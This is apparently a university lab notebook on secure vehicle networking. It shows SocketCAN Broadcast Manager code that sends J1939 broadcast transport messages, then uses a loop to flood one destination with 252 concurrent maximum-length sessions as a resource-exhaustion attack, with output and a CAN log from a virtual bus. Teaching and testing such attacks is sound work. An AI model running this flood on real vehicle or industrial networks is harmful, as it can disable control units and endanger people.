# <center> Using SocketCAN Broadcast Manager for Resource Exhaustion
## <center> SYSE 549: Secure Vehicle and Industrial Networking
## <center><img src="https://www.engr.colostate.edu/~jdaily/Systems-EN-CSU-1-C357.svg" width="400" />
### <center> Instructor: Dr. Jeremy Daily

## Prerequisites

### SocketCAN Modules
This notebook must be run on Linux with SocketCAN installed and running. If you can login to the command prompt, check for SocketCAN using `lsmod` as in the following:
```
debian@beaglebone:~$ lsmod | grep can
can_bcm                24576  1
can_raw                20480  0
vcan                   16384  0
```
This shows three CAN based kernel modules: one for BroadCast Manager (BCM), one for single CAN frames (RAW), and a virtual CAN module (vcan).

if one of the modules is missing, it can be added by using the modprobe command. For example: 
```
sudo modprobe can_bcm
```

### Network Interfaces
The `ifconfig` command will show the connected interface devices. Look for can channels. For example:

```
vcan1: flags=193<UP,RUNNING,NOARP>  mtu 72
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 108188617  bytes 865451566 (865.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 108188617  bytes 865451566 (865.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

```

Be sure the correct bitrate is selected using the following:

```
ip -details -statistics link show can1
```
Change the bitrate as follows:
```
ip link set can1 down
ip link set can1 up type can bitrate 250000
```
### Jupyter

This notebook should be run with a jupyter server on the Linux machine. For example, if using the BeagleBone, start the server with the following command:
```
jupyter notebook --ip 192.168.7.2 --no-browser &
```
The `&` symbol runs the notebook server in the background.

At the bottom of the terminal there are instructions to copy and paste the URL with a token into your browser. 

# Using the Broadcast Manager (BCM)
The broadcast manager in SocketCAN is helpful in setting up periodic messages. It takes away the timing and loop requirements for the programmer and relegates it to the kernel module. This enables a programmer to focus on the sensing and simulation parts of the program instead of the message timing. 

This example goes through transmitting a wheel speed message using the BCM.

Details and Reference:

https://github.com/nebaruzdin/can-doc/blob/master/can-bcm.txt


In [1]:
#Import the useful modules
import socket
import struct

In [2]:
# Open a socket and connect to it
sock = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)

#Change this interface to match your desired connection
# Use can1 for the beaglebone on J1939
interface = "can1"

#Connect to the interface
sock.connect((interface,))

# To match the socketCAN BCM header data structure, the following struct format can be used:
# Interval seconds and useconds are platform dependent, others are 'uint32'. 
# Pad bytes are required at the end. This padding is not documented very well.
bcm_frame_format = "@3I4l2I0q"

### Create the BCM Header
The BCM header has the following elements:
* opcode
* message flag
* count
* timing intervals
* unique CAN ID for task
* number of CAN frames

The number of CAN frames is the number of frames that are attached to the overall BCM data structure. The BCM method enables not just the simple periodic single can frame, but finite bursts of multi-frame messages. We'll start simple, then work towards a more complete example.

Let's start with setting up a transmit BCM:

#### Op-Codes
From https://www.kernel.org/doc/Documentation/networking/can.txt, the following opcodes are defined:

Transmit Operations (user space to broadcast manager):

    TX_SETUP:   Create (cyclic) transmission task.

    TX_DELETE:  Remove (cyclic) transmission task, requires only can_id.

    TX_READ:    Read properties of (cyclic) transmission task for can_id.

    TX_SEND:    Send one CAN frame.

  Transmit Responses (broadcast manager to user space):

    TX_STATUS:  Reply to TX_READ request (transmission task configuration).

    TX_EXPIRED: Notification when counter finishes sending at initial interval
      'ival1'. Requires the TX_COUNTEVT flag to be set at TX_SETUP.

  
 #### Message Flags
 From https://www.kernel.org/doc/Documentation/networking/can.txt, the following flags are defined:

    SETTIMER:           Set the values of ival1, ival2 and count

    STARTTIMER:         Start the timer with the actual values of ival1, ival2
      and count. Starting the timer leads simultaneously to emit a CAN frame.

    TX_COUNTEVT:        Create the message TX_EXPIRED when count expires

    TX_ANNOUNCE:        A change of data by the process is emitted immediately.

    TX_CP_CAN_ID:       Copies the can_id from the message header to each
      subsequent frame in frames. This is intended as usage simplification. For
      TX tasks the unique can_id from the message header may differ from the
      can_id(s) stored for transmission in the subsequent struct can_frame(s).

    TX_RESET_MULTI_IDX: Reset the index for the multiple frame transmission.
    
Definitions in python are published here:
https://github.com/caran/can4python/blob/4177bcf4368fd8484ec080e2d926cb999b14c6a5/can4python/constants.py#L72


In [3]:
# BCM flags
SETTIMER = 0x0001
STARTTIMER = 0x0002
TX_COUNTEVT = 0x0004
TX_ANNOUNCE = 0x0008
TX_CP_CAN_ID = 0x0010
RX_FILTER_ID = 0x0020
RX_CHECK_DLC = 0x0040
RX_NO_AUTOTIMER = 0x0080
RX_ANNOUNCE_RESUME = 0x0100
TX_RESET_MULTI_IDX = 0x0200
RX_RTR_FRAME = 0x0400
CAN_FD_FRAME = 0x0800

In [4]:
# To match the socketCAN CAN frame structure, the following struct format can be used:
can_frame_format = "=LB3x8s"

## Send multiframe messages
Let's send a message according to the J1939 transport protocol.

The data is an arbitrary set of bytes that is limited to a length of 1785. We'll be using the broadcast announce message format.

1. Connection management
2. Data 1 
3. Data 2
3. Data ...
4. Data n

The PGN of the data is encoded as the last three bytes of the s65260 (0xFEEC). We'll be able to specify the source address, destination address, and priority. Let's build a function using BAM to send these messages out. 

In [5]:
#create a function to send broadcast announce messges (BAM) using the J1939 fransport protocol
#Build the CAN Packets for a BAM message:
socket.CAN_EFF_FLAG = 0x80000000

def send_transport(pgn,data,sa_in,da_in=0xFF,priority=6):
    # make sure we don't have too much data to send. Max of J1939 is 255*7 = 1785
    data_to_send = data[:1785]
    
    #Sanitize source and destination address
    sa = sa_in & 0xFF
    da = da_in & 0xFF
    
    # See SAE J1939-21 for the definition of a broadcast announce message
    BAM = 32
    bytes_to_send = len(data_to_send)
    
    #Integer division to get the number of frames
    frames_to_send = bytes_to_send//7 
    
    #Check to see if there are any more data to partially fill the next frame
    if len(data_to_send)%7 > 0: 
        frames_to_send +=1
    
    #Build out the transport protocol - connection managment (TP.CM) CAN ID
    can_id = 0x00EC0000 | socket.CAN_EFF_FLAG
    can_id |= (priority & 0x07) << 26 # Set the priority 
    can_id |= (da & 0xFF) << 8 #Destination address
    can_id |= (sa  & 0xFF) #Source address
    #print("can_id = {:08X}".format(can_id))
    
    #Setup the broadcast manager
    opcode = socket.CAN_BCM_TX_SETUP
    flags = SETTIMER | STARTTIMER | TX_COUNTEVT # These flags set and start the timers for broadcast.
    count = frames_to_send + 1  #total number of messages. Include the connection management by adding 1
    ival1_tv_sec  = 0 # Seconds
    ival1_tv_usec = 20000 # Microseconds # the time between each message
    ival2_tv_sec  = 0 # Seconds
    ival2_tv_usec = 0 # Set this to zero to stop after the initial count.
    nframes = frames_to_send + 1   # Append a sequence of BAM messages
    
    #Pack the frame (i.e. make a glob of bytes) to make a valid BCM
    bcm_frame = struct.pack(bcm_frame_format,
                            opcode,
                            flags,
                            count,
                            ival1_tv_sec,
                            ival1_tv_usec,
                            ival2_tv_sec,
                            ival2_tv_usec,
                            can_id,
                            nframes)

    can_id |= 0x80000000# socket.CAN_EFF_FLAG #set the extended frame format flag for socketCAN
    
    # setup the frames to use in the BCM
    print(f"Sending {bytes_to_send} bytes in {frames_to_send} frames for pgn {pgn} to destination {da} from source {sa}.")
    
    # Make the TP.CM data field 
    pgn_bytes = struct.pack('<L',pgn)
    RESERVED = 255
    connection_data = struct.pack('<BHBBBBB',BAM,bytes_to_send,frames_to_send,RESERVED,pgn_bytes[0],pgn_bytes[1],pgn_bytes[2])

    can_dlc = len(connection_data)
    
    # Pack the information into 16 bytes for a CAN_RAW socket
    # This is the first frame in the sequence
    can_packet = struct.pack(can_frame_format, can_id, can_dlc, connection_data)

    # Append CAN_RAW frames to fill out the sequence
    # Data Transport ID, similarly constructed
    can_id_DT = 0x00EB0000 | socket.CAN_EFF_FLAG
    can_id_DT |= (priority & 0x07) << 26 # Set the priority 
    can_id_DT |= (da & 0xFF) << 8
    can_id_DT |= (sa & 0xFF)
    
    for i in range(frames_to_send):
        transport_data = struct.pack("B",i+1) + data_to_send[7*i:7*i+7]
        #Back fill the last frame with FFs
        if (i+1) == frames_to_send:
            while len(transport_data) < 8:
                transport_data += b'\xFF'
        can_packet += struct.pack(can_frame_format, can_id_DT, can_dlc, transport_data)

    # Put the frames on the network
    return (sock.send(bcm_frame+can_packet))

In [10]:
data = b'abcdefghijklmnopqrstuvwxyz'*2
send_transport(0xfeec,data,3,0xFF)

Sending 52 bytes in 8 frames for pgn 65260 to destination 255 from source 3.


184

In [11]:
data = b'abcdefghijklmnopqrstuvwxyz'*(1785//26+1)
for source in range(1,253):
    send_transport(0xfe00+source,data,source,0x00)

Sending 1785 bytes in 255 frames for pgn 65025 to destination 0 from source 1.
Sending 1785 bytes in 255 frames for pgn 65026 to destination 0 from source 2.
Sending 1785 bytes in 255 frames for pgn 65027 to destination 0 from source 3.
Sending 1785 bytes in 255 frames for pgn 65028 to destination 0 from source 4.
Sending 1785 bytes in 255 frames for pgn 65029 to destination 0 from source 5.
Sending 1785 bytes in 255 frames for pgn 65030 to destination 0 from source 6.
Sending 1785 bytes in 255 frames for pgn 65031 to destination 0 from source 7.
Sending 1785 bytes in 255 frames for pgn 65032 to destination 0 from source 8.
Sending 1785 bytes in 255 frames for pgn 65033 to destination 0 from source 9.
Sending 1785 bytes in 255 frames for pgn 65034 to destination 0 from source 10.
Sending 1785 bytes in 255 frames for pgn 65035 to destination 0 from source 11.
Sending 1785 bytes in 255 frames for pgn 65036 to destination 0 from source 12.
Sending 1785 bytes in 255 frames for pgn 65037 to

Sending 1785 bytes in 255 frames for pgn 65130 to destination 0 from source 106.
Sending 1785 bytes in 255 frames for pgn 65131 to destination 0 from source 107.
Sending 1785 bytes in 255 frames for pgn 65132 to destination 0 from source 108.
Sending 1785 bytes in 255 frames for pgn 65133 to destination 0 from source 109.
Sending 1785 bytes in 255 frames for pgn 65134 to destination 0 from source 110.
Sending 1785 bytes in 255 frames for pgn 65135 to destination 0 from source 111.
Sending 1785 bytes in 255 frames for pgn 65136 to destination 0 from source 112.
Sending 1785 bytes in 255 frames for pgn 65137 to destination 0 from source 113.
Sending 1785 bytes in 255 frames for pgn 65138 to destination 0 from source 114.
Sending 1785 bytes in 255 frames for pgn 65139 to destination 0 from source 115.
Sending 1785 bytes in 255 frames for pgn 65140 to destination 0 from source 116.
Sending 1785 bytes in 255 frames for pgn 65141 to destination 0 from source 117.
Sending 1785 bytes in 255 fr

Sending 1785 bytes in 255 frames for pgn 65234 to destination 0 from source 210.
Sending 1785 bytes in 255 frames for pgn 65235 to destination 0 from source 211.
Sending 1785 bytes in 255 frames for pgn 65236 to destination 0 from source 212.
Sending 1785 bytes in 255 frames for pgn 65237 to destination 0 from source 213.
Sending 1785 bytes in 255 frames for pgn 65238 to destination 0 from source 214.
Sending 1785 bytes in 255 frames for pgn 65239 to destination 0 from source 215.
Sending 1785 bytes in 255 frames for pgn 65240 to destination 0 from source 216.
Sending 1785 bytes in 255 frames for pgn 65241 to destination 0 from source 217.
Sending 1785 bytes in 255 frames for pgn 65242 to destination 0 from source 218.
Sending 1785 bytes in 255 frames for pgn 65243 to destination 0 from source 219.
Sending 1785 bytes in 255 frames for pgn 65244 to destination 0 from source 220.
Sending 1785 bytes in 255 frames for pgn 65245 to destination 0 from source 221.
Sending 1785 bytes in 255 fr

```
(1682531948.803005) vcan1 18EC0001#20E806FDFF01FE00 #SA = 1
(1682531948.804018) vcan1 18EC0002#20E806FDFF02FE00
(1682531948.805083) vcan1 18EC0003#20E806FDFF03FE00
(1682531948.807462) vcan1 18EC0004#20E806FDFF04FE00
(1682531948.808500) vcan1 18EC0005#20E806FDFF05FE00
(1682531948.809391) vcan1 18EC0006#20E806FDFF06FE00
(1682531948.810063) vcan1 18EC0007#20E806FDFF07FE00
(1682531948.810913) vcan1 18EC0008#20E806FDFF08FE00
(1682531948.811426) vcan1 18EC0009#20E806FDFF09FE00
(1682531948.812310) vcan1 18EC000A#20E806FDFF0AFE00
(1682531948.812820) vcan1 18EC000B#20E806FDFF0BFE00
(1682531948.813366) vcan1 18EC000C#20E806FDFF0CFE00
(1682531948.814123) vcan1 18EC000D#20E806FDFF0DFE00
(1682531948.814791) vcan1 18EC000E#20E806FDFF0EFE00
(1682531948.815463) vcan1 18EC000F#20E806FDFF0FFE00
(1682531948.816449) vcan1 18EC0010#20E806FDFF10FE00
(1682531948.816982) vcan1 18EC0011#20E806FDFF11FE00
(1682531948.817660) vcan1 18EC0012#20E806FDFF12FE00
(1682531948.818329) vcan1 18EC0013#20E806FDFF13FE00
(1682531948.819353) vcan1 18EC0014#20E806FDFF14FE00
(1682531948.819826) vcan1 18EC0015#20E806FDFF15FE00
(1682531948.820505) vcan1 18EC0016#20E806FDFF16FE00
(1682531948.821245) vcan1 18EC0017#20E806FDFF17FE00
(1682531948.821934) vcan1 18EC0018#20E806FDFF18FE00 #SA = 0x18
(1682531948.823028) vcan1 18EB0001#0161626364656667 #First DT message takes place while CM messages are still working
(1682531948.824034) vcan1 18EB0002#0161626364656667
(1682531948.825099) vcan1 18EB0003#0161626364656667
(1682531948.826188) vcan1 18EC0019#20E806FDFF19FE00
(1682531948.826929) vcan1 18EC001A#20E806FDFF1AFE00
(1682531948.827486) vcan1 18EB0004#0161626364656667
(1682531948.827619) vcan1 18EC001B#20E806FDFF1BFE00
(1682531948.828116) vcan1 18EC001C#20E806FDFF1CFE00
(1682531948.828515) vcan1 18EB0005#0161626364656667
(1682531948.828562) vcan1 18EC001D#20E806FDFF1DFE00
(1682531948.829003) vcan1 18EC001E#20E806FDFF1EFE00
(1682531948.829404) vcan1 18EB0006#0161626364656667
(1682531948.829438) vcan1 18EC001F#20E806FDFF1FFE00
(1682531948.830075) vcan1 18EB0007#0161626364656667
(1682531948.830600) vcan1 18EC0020#20E806FDFF20FE00
...

```

In [8]:
#Delete the VIN Burst session
def delete_BCM(sa,da=0xFF,priority=6):
    can_id = 0x00EC0000 | socket.CAN_EFF_FLAG
    can_id |= (priority & 0x07) << 26
    can_id |= (da & 0xFF) << 8
    can_id |= (sa & 0xFF)
    
    print("deleting can_id = {:08X}".format(can_id))
    opcode = socket.CAN_BCM_TX_DELETE
    flags = 0
    count= 0 
    ival1_tv_sec=0
    ival1_tv_usec=0
    ival2_tv_sec=0
    ival2_tv_usec=0
    nframes=0
    bcm_frame = struct.pack(bcm_frame_format,
                            opcode,
                            flags,
                            count,
                            ival1_tv_sec,
                            ival1_tv_usec,
                            ival2_tv_sec,
                            ival2_tv_usec,
                            can_id,
                            nframes)
    # Send this only once. 
    sock.send(bcm_frame)

In [9]:
delete_BCM(3)

deleting can_id = 98ECFF03
